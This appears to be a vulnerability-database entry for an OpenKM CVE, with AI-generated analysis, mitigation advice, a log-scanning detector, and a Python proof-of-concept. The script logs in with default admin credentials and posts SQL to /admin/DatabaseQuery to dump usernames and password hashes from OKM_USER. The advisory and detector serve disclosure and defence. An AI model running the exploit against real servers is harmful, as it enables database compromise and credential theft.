CVE-2026-42425
Description
OpenKM 6.3.12 contains an unrestricted SQL execution vulnerability that allows authenticated administrative users to execute arbitrary SQL statements against the application database via the DatabaseQuery interface. Attackers can submit malicious SQL queries through the qs parameter to the /admin/DatabaseQuery endpoint to extract sensitive data including usernames and password hashes from the OKM_USER table, modify permissions, or delete database records.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OpenKM 6.3.12 has an unrestricted SQL execution vulnerability in the admin DatabaseQuery interface allowing authenticated admins to extract data, modify permissions, or delete records.
Vulnerability
OpenKM Community Edition 6.3.12, OpenKM Professional Edition 7.1.47, and earlier versions contain an unrestricted SQL execution weakness in the /admin/DatabaseQuery endpoint [1][2][3]. An authenticated administrative user can supply an arbitrary SQL statement through the qs parameter [1], and the application executes it verbatim against the application database [3]. The feature ships enabled in the administrative interface and needs no configuration beyond a default administrator account [1]. The security-relevant point is that the administrator role maps directly to raw database access: any compromise of an admin login, including use of the default okmAdmin/admin credentials, is equivalent to full compromise of the database.
Exploitation
An attacker needs valid administrative credentials to reach the /admin/DatabaseQuery interface [1][3]. With the qs parameter they can submit SQL that reads, modifies, or deletes database records [1][2]; for example, a single SELECT retrieves usernames and password hashes from the OKM_USER table [1]. The request is a plain HTTP POST carrying the SQL payload, so it is trivially scriptable [1]. No further user interaction or race condition is required [1][3].
Impact
Successful exploitation yields full compromise of the database [3]: the attacker can read sensitive data including usernames and password hashes, alter permissions, and delete records [1][3]. Recovered hashes can be attacked offline, and the access can be chained with other weaknesses in the same product (for example, RCE via the BeanShell console) to achieve complete system takeover [2][3]. The impact is severe because the database holds all application data, including document metadata and user credentials [3].
Mitigation
As of the publication date, no official vendor patch is available [3]. Affected versions are OpenKM Community Edition 6.3.12, OpenKM Professional Edition 7.1.47, and earlier [1][2]. Until a fix is released, restrict access to the administrative interface by network segmentation (an allow-list for /admin/ at the reverse proxy is the simplest form), change the default okmAdmin password and enforce strong authentication for every administrator, and log and review requests to /admin/DatabaseQuery [3]. Note that a standard web-server access log records only the request line, not the POST body, so the SQL text itself is visible only if the application logs it; treat every request to the endpoint from an unexpected source as suspicious. The vendor's website (openkm.com) offers general contact information but no security advisory [4].
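The "monitor logs" control above needs something concrete to run. The following is an added example, not code from the advisory, from Terra System Labs, or from OpenKM: a small detector that scans Tomcat access-log lines in the default AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b) for hits on the DatabaseQuery servlet, flags any that come from outside an administrator allow-list, and recovers the SQL text when it travelled in the URL. The log lines are constructed; the /OpenKM context path in them is an assumption about a default deployment, and the match is on the decoded path suffix /admin/DatabaseQuery so the context path does not matter. The allow-list CIDR is likewise an assumption.

```python
from __future__ import annotations

import ipaddress
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)
TARGET_SUFFIX = "/admin/DatabaseQuery"   # path from the advisory; context path ignored


def parse_line(line: str) -> dict | None:
    """Split one access-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_database_query(target: str) -> bool:
    """Match on the percent-decoded path so /admin/Database%51uery is not missed."""
    return unquote(urlsplit(target).path).endswith(TARGET_SUFFIX)


def detect(lines, admin_nets) -> list[dict]:
    """One finding per request that reached the servlet. `sql` is only
    recoverable when the query was sent in the URL; a POST body never
    appears in the access log, so those findings carry sql=None."""
    nets = [ipaddress.ip_network(n) for n in admin_nets]
    findings = []
    for line in lines:
        rec = parse_line(line)
        if not rec or not is_database_query(rec["target"]):
            continue
        try:
            outside = not any(ipaddress.ip_address(rec["ip"]) in n for n in nets)
        except ValueError:          # a hostname was logged instead of an address
            outside = True
        qs = parse_qs(urlsplit(rec["target"]).query).get("qs")
        findings.append({
            "ip": rec["ip"], "time": rec["time"], "method": rec["method"],
            "status": int(rec["status"]),
            "sql": qs[0] if qs else None,
            "outside_allowlist": outside,
        })
    return findings


def count_by_ip(findings) -> dict[str, int]:
    """Requests to the servlet per source address, for a quick triage view."""
    return dict(Counter(f["ip"] for f in findings))


# Constructed sample log: an admin on the internal network, then an external
# address that first POSTs and then sends the query in a GET with an encoded path.
SAMPLE_LOG = """\
10.0.5.20 - - [26/May/2026:10:14:31 +0000] "GET /OpenKM/admin/DatabaseQuery HTTP/1.1" 200 4210
10.0.5.20 - - [26/May/2026:10:14:52 +0000] "POST /OpenKM/admin/DatabaseQuery HTTP/1.1" 200 8123
203.0.113.77 - - [26/May/2026:11:02:03 +0000] "POST /OpenKM/admin/DatabaseQuery HTTP/1.1" 200 9044
203.0.113.77 - - [26/May/2026:11:02:09 +0000] "GET /OpenKM/admin/Database%51uery?type=jdbc&qs=SELECT+USR_ID%2C+USR_PASSWORD+FROM+OKM_USER HTTP/1.1" 200 9044
198.51.100.9 - - [26/May/2026:11:05:00 +0000] "GET /OpenKM/frontend/index.jsp HTTP/1.1" 200 1500
"""

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG.splitlines(), ["10.0.5.0/24"]):
        flag = "ALERT" if f["outside_allowlist"] else "ok   "
        print(f"{flag} {f['ip']:15} {f['method']:4} {f['sql'] or '(body not logged)'}")
```

Run it against a real log with `detect(open("localhost_access_log.txt").readlines(), ["10.0.5.0/24"])`. Two findings in the sample are POSTs with no SQL text, which is the normal case for this exploit; that is why the allow-list check, not the SQL content, is the signal to alert on.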
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (2)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
Root cause
"The administrative DatabaseQuery interface executes user-supplied SQL statements against the backend database without any restriction, sanitization, or access control beyond basic authentication."
Attack vector
An attacker first authenticates as an administrative user, for example with the default credentials `okmAdmin`/`admin` or with compromised ones [ref_id=1]. Once authenticated, the attacker opens Administration → Database Query, selects JDBC as the query type, and submits arbitrary SQL through the `qs` parameter to the `/admin/DatabaseQuery` endpoint [ref_id=1][ref_id=2]. The application hands the statement to the backend database unfiltered, so the attacker can read password hashes from the `OKM_USER` table, change permissions, or delete records [ref_id=1][ref_id=2].
Affected code
The vulnerability exists in the administrative DatabaseQuery interface exposed at the `/admin/DatabaseQuery` endpoint [ref_id=1]. The affected code is the JDBC query handler that accepts user-supplied SQL statements via the `qs` parameter without any restriction or sanitization [ref_id=1][ref_id=2]. No patch files are available in the bundle.
What the fix does
The bundle states that at the time of publication of the Terra System Labs research, "no official vendor patch was available" for this vulnerability [ref_id=1][ref_id=2]. The advisory recommends applying compensating controls immediately, such as restricting network access to the administrative interface, enforcing strong authentication, and monitoring vendor advisories for future patches [ref_id=1]. Without a patch, organizations must rely on access control and network segmentation to mitigate the risk.
Preconditions
- auth: Attacker must have valid administrative credentials for the OpenKM application (e.g., default okmAdmin/admin or compromised credentials)
- network: Network access to the OpenKM web interface (typically port 8081)
- config: The /admin/DatabaseQuery endpoint must be exposed and accessible
- input: Attacker submits malicious SQL via the qs parameter
Reproduction
1. Log in to OpenKM with administrative credentials (e.g., `okmAdmin`/`admin`).
2. Navigate to Administration → Database Query.
3. Select JDBC as the query type.
4. Execute SQL directly against the backend database, for example: `SELECT USR_ID, USR_PASSWORD FROM OKM_USER;` [ref_id=1].
5. The results are displayed in the application interface, exposing sensitive data such as password hashes [ref_id=1].
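The reproduction steps above, and the "simple HTTP POST" mentioned under Exploitation, as a script. This is an added example and not the Terra System Labs exploit, the Nuclei template, or OpenKM code. Only the `/admin/DatabaseQuery` path, the `qs` parameter and the OKM_USER query come from the advisory; the rest is assumed: that login is the Spring Security form at `/j_spring_security_check` with `j_username`/`j_password` fields, that the UI's "JDBC" selector is sent as a form field named `type` with value `jdbc`, and that the servlet renders its result as an HTML table. The sample response page is constructed, and its two hashes are MD5 of the strings "admin" and "password", chosen to make the offline-cracking point; which hash OpenKM actually stores is not something the advisory states.

```python
from __future__ import annotations

import html
import http.cookiejar
import urllib.parse
import urllib.request
from html.parser import HTMLParser

ENDPOINT = "/admin/DatabaseQuery"                        # from the advisory
LOGIN_PATH = "/j_spring_security_check"                  # assumption: Spring Security form login
DUMP_USERS = "SELECT USR_ID, USR_PASSWORD FROM OKM_USER"  # query from the reproduction steps


def build_query_body(sql: str) -> bytes:
    """URL-encoded form body for the servlet. `qs` is the advisory's parameter;
    sending the query type as `type=jdbc` is an assumption about how the UI's
    JDBC selector is transmitted."""
    return urllib.parse.urlencode({"type": "jdbc", "qs": sql}).encode()


class _TableRows(HTMLParser):
    """Collect every <tr> of the response page as a list of cell strings."""

    def __init__(self) -> None:
        super().__init__()
        self.rows: list[list[str]] = []
        self._row: list[str] | None = None
        self._cell: list[str] = []
        self._in_cell = False

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        elif tag in ("td", "th") and self._row is not None:
            self._in_cell, self._cell = True, []

    def handle_endtag(self, tag):
        if tag in ("td", "th") and self._in_cell:
            self._row.append(html.unescape("".join(self._cell)).strip())
            self._in_cell = False
        elif tag == "tr" and self._row is not None:
            if self._row:
                self.rows.append(self._row)
            self._row = None

    def handle_data(self, data):
        if self._in_cell:
            self._cell.append(data)


def parse_result_table(page: str) -> list[list[str]]:
    """All rows, header included, of the result table(s) in a response page."""
    parser = _TableRows()
    parser.feed(page)
    return parser.rows


def extract_credentials(rows: list[list[str]]) -> list[tuple[str, str]]:
    """(username, password hash) pairs from a USR_ID/USR_PASSWORD result,
    skipping the header row and any row that is not two columns wide."""
    return [(r[0], r[1]) for r in rows if len(r) == 2 and r[0].upper() != "USR_ID"]


def run_query(base_url: str, user: str, password: str, sql: str = DUMP_USERS) -> list[list[str]]:
    """Log in, POST the query and return the parsed rows. Performs real HTTP,
    so it is not exercised offline. An empty result usually means the login
    failed and the servlet answered with the login page instead of a table."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login = urllib.parse.urlencode({"j_username": user, "j_password": password}).encode()
    opener.open(base_url + LOGIN_PATH, data=login, timeout=15).read()
    resp = opener.open(base_url + ENDPOINT, data=build_query_body(sql), timeout=15)
    return parse_result_table(resp.read().decode("utf-8", "replace"))


# Constructed sample response, shaped like a rendered JDBC SELECT result.
SAMPLE_PAGE = """<html><body><h1>Database query</h1>
<table class="results">
<tr><th>USR_ID</th><th>USR_PASSWORD</th></tr>
<tr><td>okmAdmin</td><td>21232f297a57a5a743894a0e4a801fc3</td></tr>
<tr><td>alice</td><td>5f4dcc3b5aa765d61d8327deb882cf99</td></tr>
</table></body></html>"""

if __name__ == "__main__":
    for name, digest in extract_credentials(parse_result_table(SAMPLE_PAGE)):
        print(f"{name}: {digest}")
```

Against a live instance the call is `run_query("http://host:8081/OpenKM", "okmAdmin", "admin")`, with the context path adjusted to the deployment; the parser is the part worth keeping, since the same table scraping works for any SELECT sent through the servlet.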
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/terrasystemlabs/Exploits/tree/main/OpenKM-Exploits (NVD)
- github.com/terrasystemlabs/Exploits/tree/main/OpenKM-Exploits/nuclei-templates/openkm-sql-database-query (NVD)
- hub.docker.com/r/openkm/openkm-ce (NVD)
- terrasystemlabs.com/post (NVD)
- www.exploit-db.com/exploits/52520 (NVD)
- www.openkm.com (NVD)
- www.vulncheck.com/advisories/openkm-unrestricted-sql-execution-via-databasequery (NVD)